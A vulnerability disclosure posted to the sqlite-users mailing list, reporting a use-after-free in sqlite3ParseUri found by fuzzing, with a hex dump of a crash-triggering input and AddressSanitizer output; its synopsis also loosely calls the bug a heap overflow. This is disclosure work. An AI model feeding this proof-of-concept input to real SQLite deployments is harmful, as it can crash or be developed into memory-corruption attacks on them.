Dear Sqlite team,
Please find attached a second bug report for a use after free() in sqlite.
Kindest regards,
j-
---------------------------------------------------------------------------
* *
* Sqlite3 use after free vulnerability *
* *
---------------------------------------------------------------------------
--[ Vulnerability summary:
Date reported to vendor: 27 May 2016
CVE : Not yet
Class: Use after free()
--[ Synopsis:
A heap overflow has been identified in sqlite3.
Version tested : 3.8.9 2015-03-23 21:32:50
0ee2d38deb35aefc55395e86984a9a773caf6218
--[ Vulnerability details:
The sqlite3ParseUri() function is subject to a use after free()
vulnerability.
--[ Exploitability:
The vulnerability can consistently be triggered using the PoC reproduced
below.
Successfull exploitation is heap allocator dependant.
--[ Timeline:
27 May 2016 : Vulnerability reported to vendor.
--[ PoC:
jbrossard@jbrossard-wsl3:~$ xxd /tmp/poc1/poc2.txt
0000000: 2e20 6f70 204a 3378 147b 2929 2970 204a . op J3x.{)))p J
0000010: 3378 147b 2929 290a 0a0a 0a0a 0a0a 0a0a 3x.{))).........
0000020: 0a0a 0a0a 0a0a 0a0a 3b0a 2e20 6f70 200a ........;.. op .
0000030: 0a0a 0a0a 0a0a 0a0a 0a0a 0a0a 0a3b 0a2e .............;..
0000040: 206f 7020 0a0a f60a 0a0a 0a0a 0a0a 0a0a op ............
0000050: 0a0a 0a0a 0a3b 0a2e 206f 7020 2f20 529a .....;.. op / R.
0000060: 293b 7020 2f20 529a 293b 206f 7420 2f3b );p / R.); ot /;
0000070: 272e 106f 7020 7814 7b00 1018 0a2e 206f '..op x.{..... o
0000080: 7020 2f20 4d9a p / M.
jbrossard@jbrossard-wsl3:~$
Note: You might need to compiled with a memory allocator monitor such as
address sanitizer
or run the application after setting the MALLOC_CHECK environment variable in
order to
catch this vulnerability.
jbrossard@jbrossard-wsl3:~/lab/fuzzing/results/sqlite_0days$
../../sqlite3/bin/sqlite3_afl32_asan < /tmp/poc1/poc2.txt
=================================================================
==19089==ERROR: AddressSanitizer: heap-use-after-free on address 0xf5600550 at
pc 0x82c3389 bp 0xffcb3618 sp 0xffcb360c
READ of size 1 at 0xf5600550 thread T0
#0 0x82c3388 in sqlite3Strlen30
/home/jbrossard/lab/sqlite3/build/sqlite3.c:23459
#1 0x82c3388 in sqlite3ParseUri
/home/jbrossard/lab/sqlite3/build/sqlite3.c:129866
#2 0x83e4117 in openDatabase
/home/jbrossard/lab/sqlite3/build/sqlite3.c:130235
#3 0x806c9fe in open_db
/home/jbrossard/lab/sqlite3/build/../src/shell.c:1910
#4 0x8092940 in open_db
/home/jbrossard/lab/sqlite3/build/../src/shell.c:3249
#5 0x8092940 in do_meta_command
/home/jbrossard/lab/sqlite3/build/../src/shell.c:3254
#6 0x80967a8 in process_input
/home/jbrossard/lab/sqlite3/build/../src/shell.c:4077
#7 0x8062f98 in main /home/jbrossard/lab/sqlite3/build/../src/shell.c:4694
#8 0xf70d64d2 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x194d2)
#9 0x8065148
(/home/jbrossard/lab/fuzzing/sqlite3/bin/sqlite3_afl32_asan+0x8065148)
0xf5600550 is located 0 bytes inside of 16-byte region [0xf5600550,0xf5600560)
freed by thread T0 here:
#0 0xf72d61c4 in __interceptor_free
../../../../../libsanitizer/asan/asan_malloc_linux.cc:62
#1 0x80b9d1c in sqlite3_free
/home/jbrossard/lab/sqlite3/build/sqlite3.c:20942
#2 0x809288b in do_meta_command
/home/jbrossard/lab/sqlite3/build/../src/shell.c:3257
#3 0x80967a8 in process_input
/home/jbrossard/lab/sqlite3/build/../src/shell.c:4077
#4 0x8062f98 in main /home/jbrossard/lab/sqlite3/build/../src/shell.c:4694
#5 0xf70d64d2 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x194d2)
previously allocated by thread T0 here:
#0 0xf72d63e4 in __interceptor_malloc
../../../../../libsanitizer/asan/asan_malloc_linux.cc:72
#1 0x821a3c2 in sqlite3MemMalloc
/home/jbrossard/lab/sqlite3/build/sqlite3.c:17064
#2 0x810490b in mallocWithAlarm
/home/jbrossard/lab/sqlite3/build/sqlite3.c:20733
#3 0x810490b in sqlite3Malloc
/home/jbrossard/lab/sqlite3/build/sqlite3.c:20764
#4 0x81901d6 in sqlite3StrAccumFinish
/home/jbrossard/lab/sqlite3/build/sqlite3.c:22122
#5 0x82c082c in sqlite3_vmprintf
/home/jbrossard/lab/sqlite3/build/sqlite3.c:22233
#6 0x82c082c in sqlite3_mprintf
/home/jbrossard/lab/sqlite3/build/sqlite3.c:22248
#7 0x80926e8 in do_meta_command
/home/jbrossard/lab/sqlite3/build/../src/shell.c:3252
#8 0x80967a8 in process_input
/home/jbrossard/lab/sqlite3/build/../src/shell.c:4077
#9 0x8062f98 in main /home/jbrossard/lab/sqlite3/build/../src/shell.c:4694
#10 0xf70d64d2 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x194d2)
SUMMARY: AddressSanitizer: heap-use-after-free
/home/jbrossard/lab/sqlite3/build/sqlite3.c:23459 sqlite3Strlen30
Shadow bytes around the buggy address:
0x3eac0050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3eac0060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3eac0070: fa fa fa fa fa fa 00 00 fa fa 00 00 fa fa 00 00
0x3eac0080: fa fa 00 00 fa fa fd fd fa fa 00 00 fa fa 00 00
0x3eac0090: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa fd fd
=>0x3eac00a0: fa fa fd fd fa fa fd fd fa fa[fd]fd fa fa fd fd
0x3eac00b0: fa fa 00 00 fa fa 00 fa fa fa 00 00 fa fa 00 fa
0x3eac00c0: fa fa 00 00 fa fa 00 fa fa fa 00 00 fa fa 00 fa
0x3eac00d0: fa fa 00 00 fa fa 00 04 fa fa 00 fa fa fa 00 00
0x3eac00e0: fa fa 00 04 fa fa 00 fa fa fa 00 00 fa fa 00 04
0x3eac00f0: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Contiguous container OOB:fc
ASan internal: fe
==19089==ABORTING
jbrossard@jbrossard-wsl3:~/lab/fuzzing/results/sqlite_0days$
_______________________________________________
sqlite-users mailing list
[email protected]
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users
